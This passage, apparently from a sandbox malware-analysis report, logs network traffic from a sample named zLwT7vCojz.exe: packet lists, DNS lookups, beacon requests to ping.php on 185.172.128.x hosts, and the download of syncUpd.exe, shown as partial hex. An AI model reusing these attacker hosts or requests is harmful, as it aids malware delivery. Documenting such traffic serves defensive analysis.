Apr 23, 2024 09:43:15.056534052 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056540012 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056551933 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056562901 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056567907 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056574106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056586981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056596994 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056601048 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056616068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056624889 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056627989 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056644917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056654930 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056658983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056669950 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056682110 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056693077 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056694984 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056704044 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056716919 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056725979 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056730032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056740999 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056752920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056762934 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056766987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056782007 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056787968 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056793928 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056806087 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056808949 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056818008 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056829929 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056833982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056845903 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056857109 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056858063 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056869030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056880951 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056893110 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056893110 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056904078 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056916952 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056919098 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056929111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056935072 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056942940 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056958914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056963921 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056976080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056987047 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.056989908 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.056999922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057010889 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057015896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057022095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057035923 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057039976 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057046890 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057059050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057070017 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057075024 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057082891 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057095051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057102919 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057107925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057116032 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057121038 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057136059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057142973 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057149887 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057162046 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057168961 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057173967 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057189941 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057197094 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057200909 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057213068 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057220936 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057224035 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057235956 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057244062 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057248116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057255983 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057260036 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057271957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057282925 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057291985 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057298899 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057307959 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057315111 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057327032 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057337046 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057339907 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057356119 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057367086 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057379007 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057379961 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057394981 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057404041 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057405949 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057416916 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057421923 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057430029 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057440996 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057446957 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057452917 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057466030 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057475090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057481050 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057486057 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057497978 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057511091 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057523012 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057524920 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057533979 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057547092 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057557106 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057558060 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057571888 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057583094 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057585001 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057595015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057596922 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057605982 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057611942 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057622910 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057626009 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057634115 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057647943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057656050 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057662964 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057677984 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057678938 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057686090 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057691097 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057703018 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057713985 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057714939 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057727098 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057739019 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057739019 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057749987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057760954 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057773113 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057776928 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057785034 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057796001 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057802916 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057807922 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057815075 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057822943 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057842970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057849884 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057856083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057868004 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057876110 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057878971 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057890892 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057900906 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057903051 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057915926 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057928085 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057939053 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057939053 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057939053 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057959080 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057972908 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057974100 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.057986975 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.057998896 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058001995 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058017015 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058021069 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058027983 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058039904 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058056116 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058068037 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058070898 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058082104 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058094025 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058094025 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058105946 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058119059 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058121920 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058130026 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058141947 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058150053 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058154106 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058173895 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058180094 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058191061 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058197021 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058203936 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058216095 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058223963 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058228970 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058242083 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058247089 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058254957 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058265924 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058279037 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058283091 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058290005 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058290958 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058307886 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058320045 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058331013 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058332920 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058345079 CEST	49702	80	192.168.2.7	176.97.76.106
Apr 23, 2024 09:43:15.058346987 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058363914 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058376074 CEST	80	49702	176.97.76.106	192.168.2.7
Apr 23, 2024 09:43:15.058383942 CEST	49702	80	192.168.2.7	176.97.76.106

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 09:43:12.535698891 CEST	192.168.2.7	1.1.1.1	0xb56f	Standard query (0)	note.padd.cn.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:14.593902111 CEST	192.168.2.7	1.1.1.1	0xa06b	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:20.752976894 CEST	192.168.2.7	1.1.1.1	0x56b7	Standard query (0)	svc.iolo.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:27.782224894 CEST	192.168.2.7	1.1.1.1	0xb27b	Standard query (0)	download.iolo.net	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:44:03.181654930 CEST	192.168.2.7	1.1.1.1	0x601b	Standard query (0)	westus2-2.in.applicationinsights.azure.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 09:43:12.708162069 CEST	1.1.1.1	192.168.2.7	0xb56f	No error (0)	note.padd.cn.com		176.97.76.106	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:14.698780060 CEST	1.1.1.1	192.168.2.7	0xa06b	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 09:43:20.859918118 CEST	1.1.1.1	192.168.2.7	0x56b7	No error (0)	svc.iolo.com		20.157.87.45	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:23.079001904 CEST	1.1.1.1	192.168.2.7	0xeab8	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:23.079001904 CEST	1.1.1.1	192.168.2.7	0xeab8	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:27.903155088 CEST	1.1.1.1	192.168.2.7	0xb27b	No error (0)	download.iolo.net	iolo0.b-cdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 09:43:27.903155088 CEST	1.1.1.1	192.168.2.7	0xb27b	No error (0)	iolo0.b-cdn.net		169.150.236.99	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:32.519212008 CEST	1.1.1.1	192.168.2.7	0xbd34	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 09:43:32.519212008 CEST	1.1.1.1	192.168.2.7	0xbd34	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:33.025943995 CEST	1.1.1.1	192.168.2.7	0xe88a	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:43:33.025943995 CEST	1.1.1.1	192.168.2.7	0xe88a	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:44:03.287524939 CEST	1.1.1.1	192.168.2.7	0x601b	No error (0)	westus2-2.in.applicationinsights.azure.com	westus2-2.in.ai.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 09:44:03.287524939 CEST	1.1.1.1	192.168.2.7	0x601b	No error (0)	westus2-2.in.ai.monitor.azure.com	westus2-2.in.ai.privatelink.monitor.azure.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 09:44:03.287524939 CEST	1.1.1.1	192.168.2.7	0x601b	No error (0)	westus2-2.in.ai.privatelink.monitor.azure.com	gig-ai-prod-westus2-0.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 23, 2024 09:44:10.112539053 CEST	1.1.1.1	192.168.2.7	0xe60c	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 23, 2024 09:44:10.112539053 CEST	1.1.1.1	192.168.2.7	0xe60c	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	185.172.128.90	80	5496	C:\Users\user\Desktop\zLwT7vCojz.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:08.941626072 CEST	205	OUT	GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1 Host: 185.172.128.90 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:43:10.193666935 CEST	148	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 07:43:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49700	185.172.128.228	80	5496	C:\Users\user\Desktop\zLwT7vCojz.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:10.479135990 CEST	191	OUT	GET /ping.php?substr=five HTTP/1.1 Host: 185.172.128.228 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:43:10.685028076 CEST	147	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 07:43:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49701	185.172.128.59	80	5496	C:\Users\user\Desktop\zLwT7vCojz.exe

Timestamp	Bytes transferred	Direction	Data
Apr 23, 2024 09:43:10.974117994 CEST	181	OUT	GET /syncUpd.exe HTTP/1.1 Host: 185.172.128.59 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:43:11.178503990 CEST	1289	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 07:43:11 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 23 Apr 2024 07:30:02 GMT ETag: "52200-616be85ac7fe9" Accept-Ranges: bytes Content-Length: 336384 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 05 86 02 15 41 e7 6c 46 41 e7 6c 46 41 e7 6c 46 4c b5 b3 46 59 e7 6c 46 4c b5 8c 46 39 e7 6c 46 4c b5 8d 46 6d e7 6c 46 48 9f ff 46 46 e7 6c 46 41 e7 6d 46 2f e7 6c 46 f4 79 89 46 40 e7 6c 46 4c b5 b7 46 40 e7 6c 46 f4 79 b2 46 40 e7 6c 46 52 69 63 68 41 e7 6c 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 82 38 12 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 de 00 00 00 66 c3 03 00 00 00 00 45 39 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 c4 03 00 04 00 00 b8 67 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 51 01 00 50 00 00 00 00 30 c2 03 d0 1d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 47 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e3 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 20 6b 00 00 00 f0 00 00 00 6c 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 c6 c0 03 00 60 01 00 00 b6 01 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 1d 02 00 00 30 c2 03 00 1e 02 00 00 04 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 